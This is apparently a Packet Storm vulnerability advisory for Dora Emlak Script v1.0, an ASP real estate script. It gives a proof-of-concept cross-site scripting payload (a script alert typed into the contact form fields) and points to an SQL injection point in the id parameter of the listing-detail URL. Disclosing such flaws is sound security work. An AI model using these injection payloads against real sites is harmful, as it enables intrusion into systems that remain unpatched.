Dora Emlak script version 1.0 suffers from cross site scripting and SQL injection vulnerabilities.
900fcefdb8c6bd87de201935f7285646334d2ba1c9939a15f5d61da16c5b7210Dora Emlak Script v1.0 XSS & sql injection Vulnerability.
#Software: Dora Emlak Script v1.0
#download: http://www.aspindir.com/goster/5027
#demo: http://www.fatihkaratas.info/dora/
#Found By: GeFORC3 ( G3 )
#Exploit:
1-http://www.example.com/dora/default.asp?goster=iletisim
You write xss code in page's text box
Adýnýz <script>alert("G3");</script>
Soyadýnýz <script>alert("G3");</script>
Mail Adresiniz <script>alert("G3");</script>
Konu <script>alert("G3");</script>
Mesajýnýz <script>alert("G3");</script>
Press to "gönder"(send) button.
This xss works on Dora Emlak Script v1.0
+
http://www.example.com//dora/default.asp?goster=emlakdetay&id= [SQL]
WwW.GeFORC3.Org | WwW.HeykirBlog.Com | WwW.NetKaBus.Com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed